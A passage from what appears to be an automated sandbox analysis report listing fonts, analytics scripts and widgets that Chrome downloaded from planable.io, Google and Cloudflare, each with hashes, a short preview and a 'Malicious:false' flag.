                                                                                                                                                                              Preview:!function(){"use strict";"function"==typeof SuppressedError&&SuppressedError;var r,n,t={IT_TREATMENT:0,IT_ALLOW:{7408:!0,7904:!0,9517:!0,9724:!0,10596:!0,12144:!0,12799:!0,14413:!0,17974:!0,18274:!0,19850:!0,22871:!0,23213:!0,23320:!0,25533:!0,25751:!0,27749:!0,28731:!0,28827:!0,30332:!0,30463:!0,30879:!0,31956:!0,32249:!0,32808:!0,32842:!0,33598:!0,33765:!0,34071:!0,34576:!0,35076:!0,36215:!0,36504:!0,37536:!0,38262:!0,38950:!0,40394:!0,40735:!0,41424:!0,41581:!0,41761:!0,42105:!0,42599:!0,43442:!0,44e3:!0,45040:!0,45593:!0,46649:!0,47169:!0,47724:!0,47807:!0,47813:!0,48472:!0,48816:!0,48909:!0,52235:!0,52304:!0,54077:!0,55730:!0,55970:!0,59505:!0,62142:!0,63483:!0,64091:!0,66664:!0,66684:!0,67900:!0,68098:!0,69263:!0,70131:!0,75233:!0,78242:!0,78672:!0,79374:!0,79891:!0,81588:!0,83791:!0,85969:!0,87805:!0,88452:!0,89013:!0,89458:!0,89622:!0,90301:!0,90820:!0,94343:!0,96365:!0,96816:!0,96853:!0,96878:!0,101394:!0,101830:!0,101989:!0,103646:!0,104326:!0,104825:!0,105409:!0,107508:!0,10
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 15596, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):15596
                                                                                                                                                                              Entropy (8bit):7.987145054535937
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:72BB194F7E275C92ECF5536060952844
                                                                                                                                                                              SHA1:A7419D2E8B92CBC5F89C3C03771F45C4F632964C
                                                                                                                                                                              SHA-256:E9986C62B19BCE3791C4C103A4AA87C91D22D9E1C9F252F7F802EA26D3405769
                                                                                                                                                                              SHA-512:25B14C88C5C810D469868C650A5DCB0B704D40173B3CCF65FA468A656E0751E6CAB122F5B7F088772BFFE54C5BDC9AEFD49341003A5A5BA2A91BD96F62D05CA6
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/fredokaone/v14/k3kUo8kEI-tA1RRcTZGmTlHGCac.woff2
                                                                                                                                                                              Preview:wOF2......<...........<..........................@..R....`..D.....\..Q..>..6.$..x. .....}....{.l\-v;.)...#....,{.0..M.H.........G...3...P..Y..W...G..{...xTG'.s/.S.u..e...9...);..g.8.5wx~n...z......X..%0...HIX.(..(.......h...."..F...m....,..o....i:...y....V.n`]..5.-.8."...i_.&.H.3`....h.j./.y..oq.!A.^$....A.H..\....q.t.;..K.y5.4#.C.X].bA,.].X.........,..:y.....V.S........;.....Z6P]`Z....t3j.i...K..K......W....-;.Z( ......c*.R.......*`....p.H.T....#.@...E.r..O!..?..?...X.v*....|...9;/...8.a'.7a(M.....ryLf..3...}..lh.H,2..rr|d$...0.......LqK.>.\(h....._..*`e....C....P .1A.[....P.J.`...?..n.~...v.4q]...=.H.L..fjN9=...90....cjg...il..#.T.|L.....G.`....-.;M ..@hu..k....2i....{.B....[(..;..../K...L!nV.l...s........Y...H.z.p.=R.O...\d.V{[.-!..B.....?...,a.Y.v.; ...c..p.#F....]T,*V..I.9C@+.... S.1...u......uK.[.........pJ.zQ^..5..i4X%...z....2E.Q.L...j.!..4...U....3...1.=}s....;S..l.m....R,6..^....=.[...ST.x.U...^..`WU.....!yvY.....'-.o...N.i]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (4231)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4271
                                                                                                                                                                              Entropy (8bit):5.1585036395255015
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5DF16399F76D2ECA5ED38DE2902EF002
                                                                                                                                                                              SHA1:BF3C1FD42DB67AA193D0A8B728271448B8287C55
                                                                                                                                                                              SHA-256:04BDE84C00132D26DFF806E922BA556916DB435FBAE302FFE70CDEB1FC63DF32
                                                                                                                                                                              SHA-512:25A528ADAD4D27A983219F1C0B43BA9D097AB30BD1D2E97C18F50E4563B51CDBF74AC12C18B362B4741EC535C550E51C446007111A18E4CC5A5B0F5F7B1B14CC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:window['intercomDeps'] = ["/integrations/vendor/commons.a61d7bea37d2de5d4b69.js"];window['intercomLoader'] = function() { return window.intercomIntegration=function(t){function e(e){for(var n,i,p=e[0],c=e[1],u=e[2],d=0,l=[];d<p.length;d++)i=p[d],Object.prototype.hasOwnProperty.call(r,i)&&r[i]&&l.push(r[i][0]),r[i]=0;for(n in c)Object.prototype.hasOwnProperty.call(c,n)&&(t[n]=c[n]);for(s&&s(e);l.length;)l.shift()();return a.push.apply(a,u||[]),o()}function o(){for(var t,e=0;e<a.length;e++){for(var o=a[e],n=!0,p=1;p<o.length;p++){var c=o[p];0!==r[c]&&(n=!1)}n&&(a.splice(e--,1),t=i(i.s=o[0]))}return t}var n={},r={70:0},a=[];function i(e){if(n[e])return n[e].exports;var o=n[e]={i:e,l:!1,exports:{}};return t[e].call(o.exports,o,o.exports,i),o.l=!0,o.exports}i.m=t,i.c=n,i.d=function(t,e,o){i.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:o})},i.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.definePropert
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1490)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1559
                                                                                                                                                                              Entropy (8bit):5.120755987626891
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3867B2388B619FF7FDDC29EF359FC9AA
                                                                                                                                                                              SHA1:511BED0C4D3D57AB4CF1B1D7596FB845ECFBA6AC
                                                                                                                                                                              SHA-256:31892C21AE4FB908A875BBE29DBF0DF74C2E84171CFBCAC23540F3AD8222A35A
                                                                                                                                                                              SHA-512:7BFD6E6CD2FE7A79F4797439BC7294A36D076D67A3DC5BB8E86FA5AF19B50F0E8FEC18BF33B30588486B231062E43F417708333044207A586AAD999E97E819A5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[493],{9254:function(n,e,t){function i(n,e){var t,i;return"boolean"==typeof(null==e?void 0:e.enabled)?e.enabled:null===(i=null===(t=null==n?void 0:n.__default)||void 0===t?void 0:t.enabled)||void 0===i||i}t.d(e,{n:function(){return i}})},5081:function(n,e,t){t.r(e),t.d(e,{schemaFilter:function(){return o}});var i=t(5163),r=t(9254);function o(n,e){function t(t){var o=n,u=t.event.event;if(o&&u){var a=o[u];if(!(0,r.n)(o,a))return t.updateEvent("integrations",(0,i.pi)((0,i.pi)({},t.event.integrations),{All:!1,"Segment.io":!0})),t;var s=function(n,e){var t,i;if(!n||!Object.keys(n))return{};var r=n.integrations?Object.keys(n.integrations).filter((function(e){return!1===n.integrations[e]})):[],o=[];return(null!==(t=e.remotePlugins)&&void 0!==t?t:[]).forEach((function(n){r.forEach((function(e){n.creationName==e&&o.push(n.name)}))})),(null!==(i=e.remotePlugins)&&void 0!==i?i:[]).reduce((fu
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):3266
                                                                                                                                                                              Entropy (8bit):5.5404495551585535
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:28ED0E5A1B0B12FBEBAFF32480C1ECBE
                                                                                                                                                                              SHA1:B49CEDACD375F8D9A21A9D4DA9E67F802F9F4C26
                                                                                                                                                                              SHA-256:6BB9AFB9C7ADE8328CB10FEA7AB633359E0BDA86D3CA5457DD519BC4C284EF4F
                                                                                                                                                                              SHA-512:EC75FA6DB7B332B421A8E94A2336D5F5A4417C8B24A448ADE4EADAD58B1C9AD951E58549DEBF4E6C01EAB2C900DA0A088D67D1D8820DCC130FAD065776475255
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.googleapis.com/css2?family=Noto+Sans:ital@1&display=swap
                                                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Noto Sans';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/notosans/v38/o-0kIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevHtVtX57DGjDU1QDce2V3SyFtY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Noto Sans';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/notosans/v38/o-0kIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevHtVtX57DGjDU1QDce2VTSyFtY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* devanagari */.@font-face {. font-family: 'Noto Sans';. font-style: italic;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/notosans/v38/o-0kIpQlx3QUlC5A4PNr4C5OaxRsfNNlKbCePevHtVtX57DGjDU1QDce2VHSyFtY.wof
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 82 x 17, 8-bit/color RGB, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):61
                                                                                                                                                                              Entropy (8bit):4.002585360278504
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C99E0EBE413B46708423A812573427FC
                                                                                                                                                                              SHA1:EC2F3996F477F6AF3ED0CEBEBC91C83ED1C1A7E4
                                                                                                                                                                              SHA-256:AFB8143DE33E715B938ACA11551A671B321828F9D8A69995E6D12866FCA68DBE
                                                                                                                                                                              SHA-512:F1B280431928B2AE153C84CFBF2985F412C576EAF17E19427DC2FCD0A85154617336D17257D1B17A6DA6235B395F860BC74FD9FB95E00D1721B371D93CC88224
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8ffc4cadab6a433a/1736508256010/j84DJV0bjF_ZAH2
                                                                                                                                                                              Preview:.PNG........IHDR...R...........l.....IDAT.....$.....IEND.B`.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (4616), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4616
                                                                                                                                                                              Entropy (8bit):5.80859045242662
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:15CCD98BE3980FDB85D56EAD9D6E2D44
                                                                                                                                                                              SHA1:DB8AD1683092F33ABA4B2864E67701FA5082EFB2
                                                                                                                                                                              SHA-256:9B11B31772F752D040B4E50E0FF89A57A25AB163D2F5A43AF81D4B66DC3147A7
                                                                                                                                                                              SHA-512:5A15CEB75E7839CAFE593E0F2F810124E4BF2845181C7981AAE6BEC8A364853F5D1E3FF080212C320EA301CF97888FA60B8260347440A563D1F99B3AC78080FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(a,b,c){if(!c||a!=null){c=t[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} function v(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],g;!a&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;b=b(c);b!=null&&(a?h(q,d,{configurable:!0,writable:!0,value:b}):b!==c&&(t[d]===void 0&&(a=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+a+"$"+d),h(g,t[d],{co
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 27436, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):27436
                                                                                                                                                                              Entropy (8bit):7.993342201265922
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:060850EDFE9D2F31B8B10875D3D8C5F5
                                                                                                                                                                              SHA1:6F9BB2D51EE4CDFF5835B31CEB5C459E95A23270
                                                                                                                                                                              SHA-256:772FA5A279ECAD537BEA7D71690183408A9AFF38F71A094A2DFF5698C724D9F8
                                                                                                                                                                              SHA-512:BC043504419AC2C1AD0E629EE9FB1A5EC722A564F99459BC3E0BC0E1D8ACA282326C071C20924539C3EE898FEF58B2A6A32163CC2BA541775F35EC56A6D1786F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/volkhov/v17/SlGQmQieoJcKemNecTUEhQ.woff2
                                                                                                                                                                              Preview:wOF2......k,..........j...........................^.`..:..,....s.....L..:..:...h.6.$..p. ..B..3.."[.....n....=.....J.[;.v..c.SE.r.8 h........M6B...U...a...3B9..=BB:..)K."....$.S.}.pS.h.i :;.|Iu.+....kU7.?.=h>....R.t.d.Eu....4.....K..ssZ^.r...5 -..Kf...iI..(..-p.m.Y..{.4.q.UM.&!...?z...!._t.y..!...oz..u....O...._..{.......B~....;.G...;..R....l...]n.....[.<......}.\$O.>d.`.K..;.......B@DAG..........".X.)..t..U.|..sY...>..}..o...........n..AM...5..&5%5%5..f+_..4.....7..g4]s.K}$.r.w..._..a..#.R....0....L..?#......;.7...}8~....-.&..$...?..k.}.$.....6.O..h..nn.L.@`.....=z..7..$.......x...L..%.A#..a/..<h.......=.U......f....f.G%...{.l.z...z..^....rwN.i..NAEA...!.IH..............7...J^.b.{.&!.?..._.(.`HdJ..tg*j..D..84.v.'.Q@....>.3..5..../2...o$.9.$C....h...8../{<.>^#c....TPMr..Gs......u2..w[.:...m...S..+-..t...B...U...^..#..> ...~.N./B<.......8J.kx.....OU]..@.p*...<@H!..@r^..v.........U.v....RT.d...e.d...*9.[.-/.i.<..Z}.[..4.IM..u..}.h}.YHT=....0#..O...7..|k
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 11828, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):11828
                                                                                                                                                                              Entropy (8bit):7.9827514551463805
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:E703EB2B7C0EAF208F822050572E0F0B
                                                                                                                                                                              SHA1:583FAF104917ACEA1D737E9A2C3C8E934DA5A2D1
                                                                                                                                                                              SHA-256:248A603B50674B82C502A9B0236BBC4DD7895F6120539C555D3E57D14A66B2CD
                                                                                                                                                                              SHA-512:4061CC09C4F6FC38C8D78663245EC48D07C1B3767D788D10CDC1B289FD164EA16DD401B5B396DC16068DC6EA3B1C4973AB6BD4C281A512219C041B44241F1065
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/josefinslab/v27/lW-swjwOK3Ps5GSJlNNkMalNpiZe_ldbOR4W71msR349Kg.woff2
                                                                                                                                                                              Preview:wOF2.......4......pT..-...........................P.`?STATH..L.....0.......6.$..X. ..Z.......[..Q?Z/R....~`3EQH]..9......T..A.`..dVl..8....qu.......Y7.]........nE...~..>.%...>.g... *&a...?.$.)$K.{x~n...1.1`.....o......m.(=.%.@Q.Q1@...!6uwxz.(f.W.a.V...sO....Qn..p..x......8..j.'..GP...xB......V......K.#+..%IC.[...5.RW.&..q<..r..B.V.>..iI.Bv/.p.....l..sP...O...&...>.)...=......K.<K!..d.i.....]..'..Np..d..gY...0.......t6+NR.%..q........k..}?D...2..y.>......S...<....QH....<m......3.9...a...U.A*u..O5O..AgrF..1.K._........(j2..wQ.*.........U..............dt..L..Y.i.@...+....5%O;.P......9..9...`...N.O........,..".:.....Ix.u.Xh..\.&..X..B..Yd.S..Xm..v.p6..g..pF...$.`.qe.....w.X'.s...dd....?O..%.......wV_..,1.wV}....j...T..Os.........F..U.x....o&&...4...<.....qw..}.Q[.>.'..!..7..e.J....2`.)d..2Gk.....N{)m.Y|.......nh.sN.../.C.x..9.mKR.........Fs.,..z......D.....3.!=..Q..9.y....:.-...|.......WBp......6.?....n....?.._.u.....S...Se......w<C.S=.0d
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):6431
                                                                                                                                                                              Entropy (8bit):5.108624805535396
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:720EDB0E28A12DE1C03A3E06F2BADCE7
                                                                                                                                                                              SHA1:EEDB6578A05583F6BF8AD9B781BE89021A395C4A
                                                                                                                                                                              SHA-256:B29E7A906A25EBC4752A9A73DA15456D26217B9FEC9C2300053EBA3CCACDF82E
                                                                                                                                                                              SHA-512:3440E825343150FB7B3FC6855F9C00AC6582A9A7621C21EAE7A11B2146B2473D692D1630C2B685FC79A848AF686D95694FC4EF1282668247F139D9860E0184EC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:(function () {../**.. * Configurations.. * you can change widget configuration from here.. */..const CONFIG = {...url: 'https://status.planable.io',...frameUrl: 'https://status.planable.io/widget',...position: 'bottom-right',...incident: {....textColor: '#000000',....backgroundColor: '#FFFFFF',...},...maintenance: {....textColor: '#000000',....backgroundColor: '#FFFFFF',...},...text: {"viewLatestUpdates":"View latest updates","lastUpdated":"Last updated {{time}} ago","scheduledFor":"Scheduled for","year":"year","years":"years","month":"month","months":"months","day":"day","days":"days","hour":"hour","hours":"hours","minute":"minute","minutes":"minutes"},..};...const isMobile = screen.width < 600;.../**.. * Initialization.. */..async function init() {...while (true) {....try {.....await fetchIssues();....} catch {....}....await wait(3 * 60 * 1000); // every 3 minutes...}..}...async function fetchIssues() {...let result = await fetch('https://api.instatus.com' + '/issues?locale=en&host=s
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2155)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2207
                                                                                                                                                                              Entropy (8bit):5.263299643377557
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:452003EC544586EAFB07BDA4A0707A12
                                                                                                                                                                              SHA1:9C58C05D828EAC879F2B08693F92044247071192
                                                                                                                                                                              SHA-256:36F9BF7F4514EDB409609F496BB668DCF33CBAA9F6A3219663F631014C726A97
                                                                                                                                                                              SHA-512:742FB312FD2EC13C89AECDD83E4BF52E78D8B13276688C6D8D990E5DB419F204A3864A4FA151D80A8E1A874944AB9A1B3581AC725EB69781CB23DC7CBA5FC687
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/next-integrations/integrations/linkedin-insight-tag/1.0.1/linkedin-insight-tag.dynamic.js.gz
                                                                                                                                                                              Preview:window['linkedin-insight-tagDeps'] = ["/integrations/vendor/commons.a61d7bea37d2de5d4b69.js"];window['linkedin-insight-tagLoader'] = function() { return window["linkedin-insight-tagIntegration"]=function(t){function n(n){for(var r,a,p=n[0],u=n[1],l=n[2],c=0,f=[];c<p.length;c++)a=p[c],Object.prototype.hasOwnProperty.call(o,a)&&o[a]&&f.push(o[a][0]),o[a]=0;for(r in u)Object.prototype.hasOwnProperty.call(u,r)&&(t[r]=u[r]);for(s&&s(n);f.length;)f.shift()();return i.push.apply(i,l||[]),e()}function e(){for(var t,n=0;n<i.length;n++){for(var e=i[n],r=!0,p=1;p<e.length;p++){var u=e[p];0!==o[u]&&(r=!1)}r&&(i.splice(n--,1),t=a(a.s=e[0]))}return t}var r={},o={76:0},i=[];function a(n){if(r[n])return r[n].exports;var e=r[n]={i:n,l:!1,exports:{}};return t[n].call(e.exports,e,e.exports,a),e.l=!0,e.exports}a.m=t,a.c=r,a.d=function(t,n,e){a.o(t,n)||Object.defineProperty(t,n,{enumerable:!0,get:e})},a.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (17021)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):390088
                                                                                                                                                                              Entropy (8bit):5.6559731834293885
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:DB89E6E749C593BF73EF0AA4253487BA
                                                                                                                                                                              SHA1:E26FA7771A94C7EC94FC2F78B1D05839E1C53039
                                                                                                                                                                              SHA-256:47246396D27F9E1FA6F047587418C9F972D4DFC35774549814F64E0AEB9F9688
                                                                                                                                                                              SHA-512:C7E78603477E3E41C99257C8EB89D8AD6A867692B59176760226D99CF12DBC7E5D8E991F8DD2562CB5A7DCCBAEFB5511CE663C01872462FC507438131EFA49F3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=G-HR91C4PWHQ&l=dataLayer&cx=c&gtm=45He5190v867624896za200
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":10,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":10,"vtp_includeConditions":["list","planable\\.io"],"tag_id":12},{"function":"__ogt_session_timeout","priority":10,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":10,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELEC
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 39828, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):39828
                                                                                                                                                                              Entropy (8bit):7.993232479377764
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1645EEA8FE46AF8726A81C651CBC6F61
                                                                                                                                                                              SHA1:C73667CC4C41AE0941B012EAF20BA217DDC78098
                                                                                                                                                                              SHA-256:E2E29E9BB65473F0487A06115F6CD7371AB8AF78DF7AD3374A9F7BB2FC7DEA1B
                                                                                                                                                                              SHA-512:B9CB5B344F97A18DCF1E12036965339DAD7D8D02835E1E476664665B028F3D238637BE080B2B6BD2DCADEB8C741711FCAAB3142FC17980D1E338FF8F47C31669
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/codystar/v17/FwZY7-Q1xVk-40qxOu6H6Mk.woff2
                                                                                                                                                                              Preview:wOF2...............8...9.........................`.......a.....|..#..0..6.$..\. ..~..g..[7%Qt f.....O....B.H.I+5..O.Z.}.j...2H$...k.RvCgW...}..a5'm.\....x...{6.......T.I@.4......1"*]u...m....* XXo7bQ.*..\t...5..F....j...=......d;... e....6...II.<.M..A.E...,.d..E.R..&.,'1U].DVsMqk..?N....<.?.vf..n..V..."(CP.[4J..*U..._..5..v...-.J*...f&.Yx.]...`.....S............-.in..%..?_0i..?.47...I.,.n..Y.DT4.C..].....3..9.\.(J.M...N..r.&<.|A.........@...m....Z....@..Ese.......p].V....|(uR..*............:{..{..$..X.d?..vd...M3..@.]I.1.-66%...I7!.....TJH.$[Z!.V..?.}.;9;Y$..8...u+[UEJ......,...R.d1.dJ.....?....X.......T..]U.5...BU.5ruOUm..Q....Y.4....9.w..t.....+.....LuW.5.._.".{.T....g..d..y..r..$......./d.jsH.......&.a.1!{.gy..[..2....".eL}.^iE..B......G.~LG+*..@.Y..e........qUU.Q.O....'..-..8..v.......<.....z.......Y@.8.E...@..X..I.......%..S8......8.I-...af.f_..Jp.3..%...8.....h..-..~.aH...OV..p4.._.......o\..#P.V5..U9...........>.r..e.e^.L.r.......SKl.M
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2918)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2960
                                                                                                                                                                              Entropy (8bit):5.150014804969249
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9C13C482EB1AD703DC3DFF03430137A9
                                                                                                                                                                              SHA1:1EA25931BF774BC80D9D99AEE5D266520BE01373
                                                                                                                                                                              SHA-256:6669E7413FB9334A7EF5662DACE6BF7EF124B85CC1D69761CBDF6B2DA4696608
                                                                                                                                                                              SHA-512:BD2A108850AB7057BD5FE9DC51E2D3D3D196DC0EAD4EB16509AFB006C2F75211631389EF25CEB4B0C169430888754F8F567D6C80F01EBD699436359A01DA7B7B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/next-integrations/integrations/satismeter/2.0.3/satismeter.dynamic.js.gz
                                                                                                                                                                              Preview:window['satismeterDeps'] = ["/integrations/vendor/commons.a61d7bea37d2de5d4b69.js"];window['satismeterLoader'] = function() { return window.satismeterIntegration=function(t){function e(e){for(var r,s,a=e[0],u=e[1],p=e[2],d=0,l=[];d<a.length;d++)s=a[d],Object.prototype.hasOwnProperty.call(o,s)&&o[s]&&l.push(o[s][0]),o[s]=0;for(r in u)Object.prototype.hasOwnProperty.call(u,r)&&(t[r]=u[r]);for(c&&c(e);l.length;)l.shift()();return i.push.apply(i,p||[]),n()}function n(){for(var t,e=0;e<i.length;e++){for(var n=i[e],r=!0,a=1;a<n.length;a++){var u=n[a];0!==o[u]&&(r=!1)}r&&(i.splice(e--,1),t=s(s.s=n[0]))}return t}var r={},o={123:0},i=[];function s(e){if(r[e])return r[e].exports;var n=r[e]={i:e,l:!1,exports:{}};return t[e].call(n.exports,n,n.exports,s),n.l=!0,n.exports}s.m=t,s.c=r,s.d=function(t,e,n){s.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},s.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.define
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                              Entropy (8bit):3.0269868333592873
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A0C93182C79332D06BAFEC490D4D25A8
                                                                                                                                                                              SHA1:258424D4405C6B292AB3E92469DED3CF1C0EA3B0
                                                                                                                                                                              SHA-256:2AB208B0E1A608889D8417BF932C5B2F7326DB35F1BADA89269E372647ED2C19
                                                                                                                                                                              SHA-512:FB21F755A3C49D09DECCE6C3F0C49B76CBF48ACB0B49E4B9C52B5E3420F9B1DB5B3F2C4C378B0F158ED3BE061DC6FAB5B4453B0BB91067B63B09DDE64DE20DF8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:1736508219107
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13
